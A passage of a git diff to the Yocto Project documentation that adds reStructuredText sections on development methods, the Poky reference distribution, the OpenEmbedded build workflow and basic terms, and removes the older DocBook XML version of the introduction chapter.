+ was never recommended that you use the Build Appliance as a
+ day-to-day production development environment with the Yocto Project.
+ Build Appliance was useful as a way to try out development in the
+ Yocto Project environment.
+
+3. *CROPS:* The final and best solution available now for developing
+ using the Yocto Project on a system not native to Linux is with
+ `CROPS <#gs-crops-overview>`__.
+
+.. _gs-development-methods:
+
+Development Methods
+===================
+
+The Yocto Project development environment usually involves a
+:term:`Build Host` and target
+hardware. You use the Build Host to build images and develop
+applications, while you use the target hardware to test deployed
+software.
+
+This section provides an introduction to the choices or development
+methods you have when setting up your Build Host. Depending on the your
+particular workflow preference and the type of operating system your
+Build Host runs, several choices exist that allow you to use the Yocto
+Project.
+
+.. note::
+
+ For additional detail about the Yocto Project development
+ environment, see the ":doc:`overview-manual-development-environment`"
+ chapter.
+
+- *Native Linux Host:* By far the best option for a Build Host. A
+ system running Linux as its native operating system allows you to
+ develop software by directly using the
+ :term:`BitBake` tool. You can
+ accomplish all aspects of development from a familiar shell of a
+ supported Linux distribution.
+
+ For information on how to set up a Build Host on a system running
+ Linux as its native operating system, see the
+ ":ref:`dev-manual/dev-manual-start:setting up a native linux host`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *CROss PlatformS (CROPS):* Typically, you use
+ `CROPS <https://github.com/crops/poky-container/>`__, which leverages
+ `Docker Containers <https://www.docker.com/>`__, to set up a Build
+ Host that is not running Linux (e.g. Microsoft Windows or macOS).
+
+ .. note::
+
+ You can, however, use CROPS on a Linux-based system.
+
+ CROPS is an open source, cross-platform development framework that
+ provides an easily managed, extensible environment for building
+ binaries targeted for a variety of architectures on Windows, macOS,
+ or Linux hosts. Once the Build Host is set up using CROPS, you can
+ prepare a shell environment to mimic that of a shell being used on a
+ system natively running Linux.
+
+ For information on how to set up a Build Host with CROPS, see the
+ ":ref:`dev-manual/dev-manual-start:setting up to use cross platforms (crops)`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *Windows Subsystem For Linux (WSLv2):* You may use Windows Subsystem
+ For Linux v2 to set up a build host using Windows 10.
+
+ .. note::
+
+ The Yocto Project is not compatible with WSLv1, it is compatible
+ but not officially supported nor validated with WSLv2, if you
+ still decide to use WSL please upgrade to WSLv2.
+
+ The Windows Subsystem For Linux allows Windows 10 to run a real Linux
+ kernel inside of a lightweight utility virtual machine (VM) using
+ virtualization technology.
+
+ For information on how to set up a Build Host with WSLv2, see the
+ ":ref:`dev-manual/dev-manual-start:setting up to use windows subsystem for linux (wslv2)`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *Toaster:* Regardless of what your Build Host is running, you can use
+ Toaster to develop software using the Yocto Project. Toaster is a web
+ interface to the Yocto Project's :term:`OpenEmbedded Build System`.
+ The interface
+ enables you to configure and run your builds. Information about
+ builds is collected and stored in a database. You can use Toaster to
+ configure and start builds on multiple remote build servers.
+
+ For information about and how to use Toaster, see the
+ :doc:`../toaster-manual/toaster-manual`.
+
+.. _reference-embedded-distribution:
+
+Reference Embedded Distribution (Poky)
+======================================
+
+"Poky", which is pronounced *Pock*-ee, is the name of the Yocto
+Project's reference distribution or Reference OS Kit. Poky contains the
+:term:`OpenEmbedded Build System`
+(:term:`BitBake` and
+:term:`OpenEmbedded-Core (OE-Core)`) as well as a set
+of :term:`Metadata` to get you started
+building your own distro. In other words, Poky is a base specification
+of the functionality needed for a typical embedded system as well as the
+components from the Yocto Project that allow you to build a distribution
+into a usable binary image.
+
+Poky is a combined repository of BitBake, OpenEmbedded-Core (which is
+found in ``meta``), ``meta-poky``, ``meta-yocto-bsp``, and documentation
+provided all together and known to work well together. You can view
+these items that make up the Poky repository in the
+:yocto_git:`Source Repositories </cgit/cgit.cgi/poky/tree/>`.
+
+.. note::
+
+ If you are interested in all the contents of the
+ poky
+ Git repository, see the ":ref:`ref-manual/ref-structure:top-level core components`"
+ section in the Yocto Project Reference Manual.
+
+The following figure illustrates what generally comprises Poky:
+
+.. image:: figures/poky-reference-distribution.png
+ :align: center
+
+- BitBake is a task executor and scheduler that is the heart of the
+ OpenEmbedded build system.
+
+- ``meta-poky``, which is Poky-specific metadata.
+
+- ``meta-yocto-bsp``, which are Yocto Project-specific Board Support
+ Packages (BSPs).
+
+- OpenEmbedded-Core (OE-Core) metadata, which includes shared
+ configurations, global variable definitions, shared classes,
+ packaging, and recipes. Classes define the encapsulation and
+ inheritance of build logic. Recipes are the logical units of software
+ and images to be built.
+
+- Documentation, which contains the Yocto Project source files used to
+ make the set of user manuals.
+
+.. note::
+
+ While Poky is a "complete" distribution specification and is tested
+ and put through QA, you cannot use it as a product "out of the box"
+ in its current form.
+
+To use the Yocto Project tools, you can use Git to clone (download) the
+Poky repository then use your local copy of the reference distribution
+to bootstrap your own distribution.
+
+.. note::
+
+ Poky does not contain binary files. It is a working example of how to
+ build your own custom Linux distribution from source.
+
+Poky has a regular, well established, six-month release cycle under its
+own version. Major releases occur at the same time major releases (point
+releases) occur for the Yocto Project, which are typically in the Spring
+and Fall. For more information on the Yocto Project release schedule and
+cadence, see the ":doc:`../ref-manual/ref-release-process`" chapter in the
+Yocto Project Reference Manual.
+
+Much has been said about Poky being a "default configuration". A default
+configuration provides a starting image footprint. You can use Poky out
+of the box to create an image ranging from a shell-accessible minimal
+image all the way up to a Linux Standard Base-compliant image that uses
+a GNOME Mobile and Embedded (GMAE) based reference user interface called
+Sato.
+
+One of the most powerful properties of Poky is that every aspect of a
+build is controlled by the metadata. You can use metadata to augment
+these base image types by adding metadata
+`layers <#the-yocto-project-layer-model>`__ that extend functionality.
+These layers can provide, for example, an additional software stack for
+an image type, add a board support package (BSP) for additional
+hardware, or even create a new image type.
+
+Metadata is loosely grouped into configuration files or package recipes.
+A recipe is a collection of non-executable metadata used by BitBake to
+set variables or define additional build-time tasks. A recipe contains
+fields such as the recipe description, the recipe version, the license
+of the package and the upstream source repository. A recipe might also
+indicate that the build process uses autotools, make, distutils or any
+other build process, in which case the basic functionality can be
+defined by the classes it inherits from the OE-Core layer's class
+definitions in ``./meta/classes``. Within a recipe you can also define
+additional tasks as well as task prerequisites. Recipe syntax through
+BitBake also supports both ``_prepend`` and ``_append`` operators as a
+method of extending task functionality. These operators inject code into
+the beginning or end of a task. For information on these BitBake
+operators, see the
+":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:appending and prepending (override style syntax)`"
+section in the BitBake User's Manual.
+
+.. _openembedded-build-system-workflow:
+
+The OpenEmbedded Build System Workflow
+======================================
+
+The :term:`OpenEmbedded Build System` uses a "workflow" to
+accomplish image and SDK generation. The following figure overviews that
+workflow:
+
+.. image:: figures/YP-flow-diagram.png
+ :align: center
+
+Following is a brief summary of the "workflow":
+
+1. Developers specify architecture, policies, patches and configuration
+ details.
+
+2. The build system fetches and downloads the source code from the
+ specified location. The build system supports standard methods such
+ as tarballs or source code repositories systems such as Git.
+
+3. Once source code is downloaded, the build system extracts the sources
+ into a local work area where patches are applied and common steps for
+ configuring and compiling the software are run.
+
+4. The build system then installs the software into a temporary staging
+ area where the binary package format you select (DEB, RPM, or IPK) is
+ used to roll up the software.
+
+5. Different QA and sanity checks run throughout entire build process.
+
+6. After the binaries are created, the build system generates a binary
+ package feed that is used to create the final root file image.
+
+7. The build system generates the file system image and a customized
+ Extensible SDK (eSDK) for application development in parallel.
+
+For a very detailed look at this workflow, see the "`OpenEmbedded Build
+System Concepts <#openembedded-build-system-build-concepts>`__" section.
+
+Some Basic Terms
+================
+
+It helps to understand some basic fundamental terms when learning the
+Yocto Project. Although a list of terms exists in the ":doc:`Yocto Project
+Terms <../ref-manual/ref-terms>`" section of the Yocto Project
+Reference Manual, this section provides the definitions of some terms
+helpful for getting started:
+
+- *Configuration Files:* Files that hold global definitions of
+ variables, user-defined variables, and hardware configuration
+ information. These files tell the :term:`OpenEmbedded Build System`
+ what to build and
+ what to put into the image to support a particular platform.
+
+- *Extensible Software Development Kit (eSDK):* A custom SDK for
+ application developers. This eSDK allows developers to incorporate
+ their library and programming changes back into the image to make
+ their code available to other application developers. For information
+ on the eSDK, see the :doc:`../sdk-manual/sdk-manual` manual.
+
+- *Layer:* A collection of related recipes. Layers allow you to
+ consolidate related metadata to customize your build. Layers also
+ isolate information used when building for multiple architectures.
+ Layers are hierarchical in their ability to override previous
+ specifications. You can include any number of available layers from
+ the Yocto Project and customize the build by adding your layers after
+ them. You can search the Layer Index for layers used within Yocto
+ Project.
+
+ For more detailed information on layers, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section in the Yocto Project Development Tasks Manual. For a
+ discussion specifically on BSP Layers, see the
+ ":ref:`bsp-guide/bsp:bsp layers`" section in the Yocto
+ Project Board Support Packages (BSP) Developer's Guide.
+
+- *Metadata:* A key element of the Yocto Project is the Metadata that
+ is used to construct a Linux distribution and is contained in the
+ files that the OpenEmbedded build system parses when building an
+ image. In general, Metadata includes recipes, configuration files,
+ and other information that refers to the build instructions
+ themselves, as well as the data used to control what things get built
+ and the effects of the build. Metadata also includes commands and
+ data used to indicate what versions of software are used, from where
+ they are obtained, and changes or additions to the software itself
+ (patches or auxiliary files) that are used to fix bugs or customize
+ the software for use in a particular situation. OpenEmbedded-Core is
+ an important set of validated metadata.
+
+- *OpenEmbedded Build System:* The terms "BitBake" and "build system"
+ are sometimes used for the OpenEmbedded Build System.
+
+ BitBake is a task scheduler and execution engine that parses
+ instructions (i.e. recipes) and configuration data. After a parsing
+ phase, BitBake creates a dependency tree to order the compilation,
+ schedules the compilation of the included code, and finally executes
+ the building of the specified custom Linux image (distribution).
+ BitBake is similar to the ``make`` tool.
+
+ During a build process, the build system tracks dependencies and
+ performs a native or cross-compilation of the package. As a first
+ step in a cross-build setup, the framework attempts to create a
+ cross-compiler toolchain (i.e. Extensible SDK) suited for the target
+ platform.
+
+- *OpenEmbedded-Core (OE-Core):* OE-Core is metadata comprised of
+ foundation recipes, classes, and associated files that are meant to
+ be common among many different OpenEmbedded-derived systems,
+ including the Yocto Project. OE-Core is a curated subset of an
+ original repository developed by the OpenEmbedded community that has
+ been pared down into a smaller, core set of continuously validated
+ recipes. The result is a tightly controlled and quality-assured core
+ set of recipes.
+
+ You can see the Metadata in the ``meta`` directory of the Yocto
+ Project `Source
+ Repositories <http://git.yoctoproject.org/cgit/cgit.cgi>`__.
+
+- *Packages:* In the context of the Yocto Project, this term refers to
+ a recipe's packaged output produced by BitBake (i.e. a "baked
+ recipe"). A package is generally the compiled binaries produced from
+ the recipe's sources. You "bake" something by running it through
+ BitBake.
+
+ It is worth noting that the term "package" can, in general, have
+ subtle meanings. For example, the packages referred to in the
+ ":ref:`ref-manual/ref-system-requirements:required packages for the build host`"
+ section in the Yocto Project Reference Manual are compiled binaries
+ that, when installed, add functionality to your Linux distribution.
+
+ Another point worth noting is that historically within the Yocto
+ Project, recipes were referred to as packages - thus, the existence
+ of several BitBake variables that are seemingly mis-named, (e.g.
+ :term:`PR`,
+ :term:`PV`, and
+ :term:`PE`).
+
+- *Poky:* Poky is a reference embedded distribution and a reference
+ test configuration. Poky provides the following:
+
+ - A base-level functional distro used to illustrate how to customize
+ a distribution.
+
+ - A means by which to test the Yocto Project components (i.e. Poky
+ is used to validate the Yocto Project).
+
+ - A vehicle through which you can download the Yocto Project.
+
+ Poky is not a product level distro. Rather, it is a good starting
+ point for customization.
+
+ .. note::
+
+ Poky is an integration layer on top of OE-Core.
+
+- *Recipe:* The most common form of metadata. A recipe contains a list
+ of settings and tasks (i.e. instructions) for building packages that
+ are then used to build the binary image. A recipe describes where you
+ get source code and which patches to apply. Recipes describe
+ dependencies for libraries or for other recipes as well as
+ configuration and compilation options. Related recipes are
+ consolidated into a layer.
diff --git a/documentation/overview-manual/overview-manual-yp-intro.xml b/documentation/overview-manual/overview-manual-yp-intro.xml
deleted file mode 100644
index 1b60a30302..0000000000
--- a/documentation/overview-manual/overview-manual-yp-intro.xml
+++ /dev/null
@@ -1,1332 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='overview-yp'>
- <title>Introducing the Yocto Project</title>
-
- <section id='what-is-the-yocto-project'>
- <title>What is the Yocto Project?</title>
-
- <para>
- The Yocto Project is an open source collaboration project
- that helps developers create custom Linux-based systems that are
- designed for embedded products regardless of the product's hardware
- architecture.
- Yocto Project provides a flexible toolset and a development
- environment that allows embedded device developers across the
- world to collaborate through shared technologies, software stacks,
- configurations, and best practices used to create these tailored
- Linux images.
- </para>
-
- <para>
- Thousands of developers worldwide have discovered that Yocto
- Project provides advantages in both systems and applications
- development, archival and management benefits, and customizations
- used for speed, footprint, and memory utilization.
- The project is a standard when it comes to delivering embedded
- software stacks.
- The project allows software customizations and build interchange
- for multiple hardware platforms as well as software stacks that
- can be maintained and scaled.
- </para>
-
- <para id='yp-key-dev-elements'>
- <imagedata fileref="figures/key-dev-elements.png" format="PNG" align='center' width="8in"/>
- </para>
-
- <para>
- For further introductory information on the Yocto Project, you
- might be interested in this
- <ulink url='https://www.embedded.com/electronics-blogs/say-what-/4458600/Why-the-Yocto-Project-for-my-IoT-Project-'>article</ulink>
- by Drew Moseley and in this short introductory
- <ulink url='https://www.youtube.com/watch?v=utZpKM7i5Z4'>video</ulink>.
- </para>
-
- <para>
- The remainder of this section overviews advantages and challenges
- tied to the Yocto Project.
- </para>
-
- <section id='gs-features'>
- <title>Features</title>
-
- <para>
- The following list describes features and advantages of the
- Yocto Project:
- <itemizedlist>
- <listitem><para>
- <emphasis>Widely Adopted Across the Industry:</emphasis>
- Semiconductor, operating system, software, and
- service vendors exist whose products and services
- adopt and support the Yocto Project.
- For a look at the Yocto Project community and
- the companies involved with the Yocto
- Project, see the "COMMUNITY" and "ECOSYSTEM" tabs
- on the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project</ulink>
- home page.
- </para></listitem>
- <listitem><para>
- <emphasis>Architecture Agnostic:</emphasis>
- Yocto Project supports Intel, ARM, MIPS, AMD, PPC
- and other architectures.
- Most ODMs, OSVs, and chip vendors create and supply
- BSPs that support their hardware.
- If you have custom silicon, you can create a BSP
- that supports that architecture.</para>
-
- <para>Aside from lots of architecture support, the
- Yocto Project fully supports a wide range of device
- emulation through the Quick EMUlator (QEMU).
- </para></listitem>
- <listitem><para>
- <emphasis>Images and Code Transfer Easily:</emphasis>
- Yocto Project output can easily move between
- architectures without moving to new development
- environments.
- Additionally, if you have used the Yocto Project to
- create an image or application and you find yourself
- not able to support it, commercial Linux vendors such
- as Wind River, Mentor Graphics, Timesys, and ENEA could
- take it and provide ongoing support.
- These vendors have offerings that are built using
- the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>Flexibility:</emphasis>
- Corporations use the Yocto Project many different ways.
- One example is to create an internal Linux distribution
- as a code base the corporation can use across multiple
- product groups.
- Through customization and layering, a project group
- can leverage the base Linux distribution to create
- a distribution that works for their product needs.
- </para></listitem>
- <listitem><para>
- <emphasis>Ideal for Constrained Embedded and IoT devices:</emphasis>
- Unlike a full Linux distribution, you can use the
- Yocto Project to create exactly what you need for
- embedded devices.
- You only add the feature support or packages that you
- absolutely need for the device.
- For devices that have display hardware, you can use
- available system components such as X11, GTK+, Qt,
- Clutter, and SDL (among others) to create a rich user
- experience.
- For devices that do not have a display or where you
- want to use alternative UI frameworks, you can choose
- to not install these components.
- </para></listitem>
- <listitem><para>
- <emphasis>Comprehensive Toolchain Capabilities:</emphasis>
- Toolchains for supported architectures satisfy most
- use cases.
- However, if your hardware supports features that are
- not part of a standard toolchain, you can easily
- customize that toolchain through specification of
- platform-specific tuning parameters.
- And, should you need to use a third-party toolchain,
- mechanisms built into the Yocto Project allow for that.
- </para></listitem>
- <listitem><para>
- <emphasis>Mechanism Rules Over Policy:</emphasis>
- Focusing on mechanism rather than policy ensures that
- you are free to set policies based on the needs of your
- design instead of adopting decisions enforced by some
- system software provider.
- </para></listitem>
- <listitem><para>
- <emphasis>Uses a Layer Model:</emphasis>
- The Yocto Project
- <link linkend='the-yocto-project-layer-model'>layer infrastructure</link>
- groups related functionality into separate bundles.
- You can incrementally add these grouped functionalities
- to your project as needed.
- Using layers to isolate and group functionality
- reduces project complexity and redundancy, allows you
- to easily extend the system, make customizations,
- and keep functionality organized.
- </para></listitem>
- <listitem><para>
- <emphasis>Supports Partial Builds:</emphasis>
- You can build and rebuild individual packages as
- needed.
- Yocto Project accomplishes this through its
- <link linkend='shared-state-cache'>shared-state cache</link>
- (sstate) scheme.
- Being able to build and debug components individually
- eases project development.
- </para></listitem>
- <listitem><para>
- <emphasis>Releases According to a Strict Schedule:</emphasis>
- Major releases occur on a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-release-process'>six-month cycle</ulink>
- predictably in October and April.
- The most recent two releases support point releases
- to address common vulnerabilities and exposures.
- This predictability is crucial for projects based on
- the Yocto Project and allows development teams to
- plan activities.
- </para></listitem>
- <listitem><para>
- <emphasis>Rich Ecosystem of Individuals and Organizations:</emphasis>
- For open source projects, the value of community is
- very important.
- Support forums, expertise, and active developers who
- continue to push the Yocto Project forward are readily
- available.
- </para></listitem>
- <listitem><para>
- <emphasis>Binary Reproducibility:</emphasis>
- The Yocto Project allows you to be very specific about
- dependencies and achieves very high percentages of
- binary reproducibility (e.g. 99.8% for
- <filename>core-image-minimal</filename>).
- When distributions are not specific about which
- packages are pulled in and in what order to support
- dependencies, other build systems can arbitrarily
- include packages.
- </para></listitem>
- <listitem><para>
- <emphasis>License Manifest:</emphasis>
- The Yocto Project provides a
- <ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>license manifest</ulink>
- for review by people who need to track the use of open
- source licenses (e.g.legal teams).
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='gs-challenges'>
- <title>Challenges</title>
-
- <para>
- The following list presents challenges you might encounter
- when developing using the Yocto Project:
- <itemizedlist>
- <listitem><para>
- <emphasis>Steep Learning Curve:</emphasis>
- The Yocto Project has a steep learning curve and has
- many different ways to accomplish similar tasks.
- It can be difficult to choose how to proceed when
- varying methods exist by which to accomplish a given
- task.
- </para></listitem>
- <listitem><para>
- <emphasis>Understanding What Changes You Need to Make
- For Your Design Requires Some Research:</emphasis>
- Beyond the simple tutorial stage, understanding what
- changes need to be made for your particular design
- can require a significant amount of research and
- investigation.
- For information that helps you transition from
- trying out the Yocto Project to using it for your
- project, see the
- "<ulink url='&YOCTO_DOCS_URL;/what-i-wish-id-known/'>What I wish I'd Known</ulink>"
- and
- "<ulink url='&YOCTO_DOCS_URL;/transitioning-to-a-custom-environment/'>Transitioning to a Custom Environment for Systems Development</ulink>"
- documents on the Yocto Project website.
- </para></listitem>
- <listitem><para>
- <emphasis>Project Workflow Could Be Confusing:</emphasis>
- The
- <link linkend='overview-development-environment'>Yocto Project workflow</link>
- could be confusing if you are used to traditional
- desktop and server software development.
- In a desktop development environment, mechanisms exist
- to easily pull and install new packages, which are
- typically pre-compiled binaries from servers accessible
- over the Internet.
- Using the Yocto Project, you must modify your
- configuration and rebuild to add additional packages.
- </para></listitem>
- <listitem><para>
- <emphasis>Working in a Cross-Build Environment Can
- Feel Unfamiliar:</emphasis>
- When developing code to run on a target, compilation,
- execution, and testing done on the actual target
- can be faster than running a BitBake build on a
- development host and then deploying binaries to the
- target for test.
- While the Yocto Project does support development tools
- on the target, the additional step of integrating your
- changes back into the Yocto Project build environment
- would be required.
- Yocto Project supports an intermediate approach that
- involves making changes on the development system
- within the BitBake environment and then deploying only
- the updated packages to the target.</para>
-
- <para>The Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- produces packages in standard formats (i.e. RPM,
- DEB, IPK, and TAR).
- You can deploy these packages into the running system
- on the target by using utilities on the target such
- as <filename>rpm</filename> or
- <filename>ipk</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis>Initial Build Times Can be Significant:</emphasis>
- Long initial build times are unfortunately unavoidable
- due to the large number of packages initially built
- from scratch for a fully functioning Linux system.
- Once that initial build is completed, however, the
- shared-state (sstate) cache mechanism Yocto Project
- uses keeps the system from rebuilding packages that
- have not been "touched" since the last build.
- The sstate mechanism significantly reduces times
- for successive builds.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='the-yocto-project-layer-model'>
- <title>The Yocto Project Layer Model</title>
-
- <para>
- The Yocto Project's "Layer Model" is a development model for
- embedded and IoT Linux creation that distinguishes the
- Yocto Project from other simple build systems.
- The Layer Model simultaneously supports collaboration and
- customization.
- Layers are repositories that contain related sets of instructions
- that tell the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- what to do.
- You can collaborate, share, and reuse layers.
- </para>
-
- <para>
- Layers can contain changes to previous instructions or settings
- at any time.
- This powerful override capability is what allows you to customize
- previously supplied collaborative or community layers to suit your
- product requirements.
- </para>
-
- <para>
- You use different layers to logically separate information in your
- build.
- As an example, you could have BSP, GUI, distro configuration,
- middleware, or application layers.
- Putting your entire build into one layer limits and complicates
- future customization and reuse.
- Isolating information into layers, on the other hand, helps
- simplify future customizations and reuse.
- You might find it tempting to keep everything in one layer when
- working on a single project.
- However, the more modular your Metadata, the easier
- it is to cope with future changes.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Use Board Support Package (BSP) layers from silicon
- vendors when possible.
- </para></listitem>
- <listitem><para>
- Familiarize yourself with the
- <ulink url='https://caffelli-staging.yoctoproject.org/software-overview/layers/'>Yocto Project curated layer index</ulink>
- or the
- <ulink url='http://layers.openembedded.org/layerindex/branch/master/layers/'>OpenEmbedded layer index</ulink>.
- The latter contains more layers but they are less
- universally validated.
- </para></listitem>
- <listitem><para>
- Layers support the inclusion of technologies, hardware
- components, and software components.
- The
- <ulink url='&YOCTO_DOCS_DEV_URL;#making-sure-your-layer-is-compatible-with-yocto-project'>Yocto Project Compatible</ulink>
- designation provides a minimum level of standardization
- that contributes to a strong ecosystem.
- "YP Compatible" is applied to appropriate products and
- software components such as BSPs, other OE-compatible
- layers, and related open-source projects, allowing the
- producer to use Yocto Project badges and branding
- assets.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- To illustrate how layers are used to keep things modular, consider
- machine customizations.
- These types of customizations typically reside in a special layer,
- rather than a general layer, called a BSP Layer.
- Furthermore, the machine customizations should be isolated from
- recipes and Metadata that support a new GUI environment,
- for example.
- This situation gives you a couple of layers: one for the machine
- configurations, and one for the GUI environment.
- It is important to understand, however, that the BSP layer can
- still make machine-specific additions to recipes within the GUI
- environment layer without polluting the GUI layer itself
- with those machine-specific changes.
- You can accomplish this through a recipe that is a BitBake append
- (<filename>.bbappend</filename>) file, which is described later
- in this section.
- <note>
- For general information on BSP layer structure, see the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Packages (BSP) Developer's Guide</ulink>.
- </note>
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- contains both general layers and BSP layers right out of the box.
- You can easily identify layers that ship with a Yocto Project
- release in the Source Directory by their names.
- Layers typically have names that begin with the string
- <filename>meta-</filename>.
- <note>
- It is not a requirement that a layer name begin with the
- prefix <filename>meta-</filename>, but it is a commonly
- accepted standard in the Yocto Project community.
- </note>
- For example, if you were to examine the
- <ulink url='https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/'>tree view</ulink>
- of the <filename>poky</filename> repository, you will see several
- layers: <filename>meta</filename>,
- <filename>meta-skeleton</filename>,
- <filename>meta-selftest</filename>,
- <filename>meta-poky</filename>, and
- <filename>meta-yocto-bsp</filename>.
- Each of these repositories represents a distinct layer.
- </para>
-
- <para>
- For procedures on how to create layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='components-and-tools'>
- <title>Components and Tools</title>
-
- <para>
- The Yocto Project employs a collection of components and
- tools used by the project itself, by project developers,
- and by those using the Yocto Project.
- These components and tools are open source projects and
- metadata that are separate from the reference distribution
- (<ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>)
- and the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
- Most of the components and tools are downloaded separately.
- </para>
-
- <para>
- This section provides brief overviews of the components and
- tools associated with the Yocto Project.
- </para>
-
- <section id='gs-development-tools'>
- <title>Development Tools</title>
-
- <para>
- The following list consists of tools that help you develop
- images and applications using the Yocto Project:
- <itemizedlist>
- <listitem><para id='gs-crops-overview'>
- <emphasis>CROPS:</emphasis>
- <ulink url='https://github.com/crops/poky-container/'>CROPS</ulink>
- is an open source, cross-platform development framework
- that leverages
- <ulink url='https://www.docker.com/'>Docker Containers</ulink>.
- CROPS provides an easily managed, extensible environment
- that allows you to build binaries for a variety of
- architectures on Windows, Linux and Mac OS X hosts.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>devtool</filename>:</emphasis>
- This command-line tool is available as part of the
- extensible SDK (eSDK) and is its cornerstone.
- You can use <filename>devtool</filename> to help build,
- test, and package software within the eSDK.
- You can use the tool to optionally integrate what you
- build into an image built by the OpenEmbedded build
- system.</para>
-
- <para>The <filename>devtool</filename> command employs
- a number of sub-commands that allow you to add, modify,
- and upgrade recipes.
- As with the OpenEmbedded build system, “recipesâ€
- represent software packages within
- <filename>devtool</filename>.
- When you use <filename>devtool add</filename>, a recipe
- is automatically created.
- When you use <filename>devtool modify</filename>, the
- specified existing recipe is used in order to determine
- where to get the source code and how to patch it.
- In both cases, an environment is set up so that when
- you build the recipe a source tree that is under your
- control is used in order to allow you to make changes
- to the source as desired.
- By default, both new recipes and the source go into
- a “workspace†directory under the eSDK.
- The <filename>devtool upgrade</filename> command
- updates an existing recipe so that you can build it
- for an updated set of source files.</para>
-
- <para>You can read about the
- <filename>devtool</filename> workflow in the Yocto
- Project Application Development and Extensible
- Software Development Kit (eSDK) Manual in the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'>Using <filename>devtool</filename> in Your SDK Workflow'</ulink>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Extensible Software Development Kit (eSDK):</emphasis>
- The eSDK provides a cross-development toolchain and
- libraries tailored to the contents of a specific image.
- The eSDK makes it easy to add new applications and
- libraries to an image, modify the source for an
- existing component, test changes on the target
- hardware, and integrate into the rest of the
- OpenEmbedded build system.
- The eSDK gives you a toolchain experience supplemented
- with the powerful set of <filename>devtool</filename>
- commands tailored for the Yocto Project environment.
- </para>
-
- <para>For information on the eSDK, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Toaster:</emphasis>
- Toaster is a web interface to the Yocto Project
- OpenEmbedded build system.
- Toaster allows you to configure, run, and view
- information about builds.
- For information on Toaster, see the
- <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='gs-production-tools'>
- <title>Production Tools</title>
-
- <para>
- The following list consists of tools that help production
- related activities using the Yocto Project:
- <itemizedlist>
- <listitem><para>
- <emphasis>Auto Upgrade Helper:</emphasis>
- This utility when used in conjunction with the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- (BitBake and OE-Core) automatically generates upgrades
- for recipes that are based on new versions of the
- recipes published upstream.
- </para></listitem>
- <listitem><para>
- <emphasis>Recipe Reporting System:</emphasis>
- The Recipe Reporting System tracks recipe versions
- available for Yocto Project.
- The main purpose of the system is to help you
- manage the recipes you maintain and to offer a dynamic
- overview of the project.
- The Recipe Reporting System is built on top of the
- <ulink url="http://layers.openembedded.org/layerindex/layers/">OpenEmbedded Layer Index</ulink>,
- which is a website that indexes OpenEmbedded-Core
- layers.
- </para></listitem>
- <listitem><para>
- <emphasis>Patchwork:</emphasis>
- <ulink url='http://jk.ozlabs.org/projects/patchwork/'>Patchwork</ulink>
- is a fork of a project originally started by
- <ulink url='http://ozlabs.org/'>OzLabs</ulink>.
- The project is a web-based tracking system designed
- to streamline the process of bringing contributions
- into a project.
- The Yocto Project uses Patchwork as an organizational
- tool to handle patches, which number in the thousands
- for every release.
- </para></listitem>
- <listitem><para>
- <emphasis>AutoBuilder:</emphasis>
- AutoBuilder is a project that automates build tests
- and quality assurance (QA).
- By using the public AutoBuilder, anyone can determine
- the status of the current "master" branch of Poky.
- <note>
- AutoBuilder is based on
- <ulink url='https://buildbot.net/'>buildbot</ulink>.
- </note></para>
-
- <para>A goal of the Yocto Project is to lead the
- open source industry with a project that automates
- testing and QA procedures.
- In doing so, the project encourages a development
- community that publishes QA and test plans, publicly
- demonstrates QA and test plans, and encourages
- development of tools that automate and test and QA
- procedures for the benefit of the development
- community.</para>
-
- <para>You can learn more about the AutoBuilder used
- by the Yocto Project
- <ulink url='&YOCTO_AB_URL;'>here</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Cross-Prelink:</emphasis>
- Prelinking is the process of pre-computing the load
- addresses and link tables generated by the dynamic
- linker as compared to doing this at runtime.
- Doing this ahead of time results in performance
- improvements when the application is launched and
- reduced memory usage for libraries shared by many
- applications.</para>
-
- <para>Historically, cross-prelink is a variant of
- prelink, which was conceived by
- <ulink url='http://people.redhat.com/jakub/prelink.pdf'>Jakub Jel&iacute;nek</ulink>
- a number of years ago.
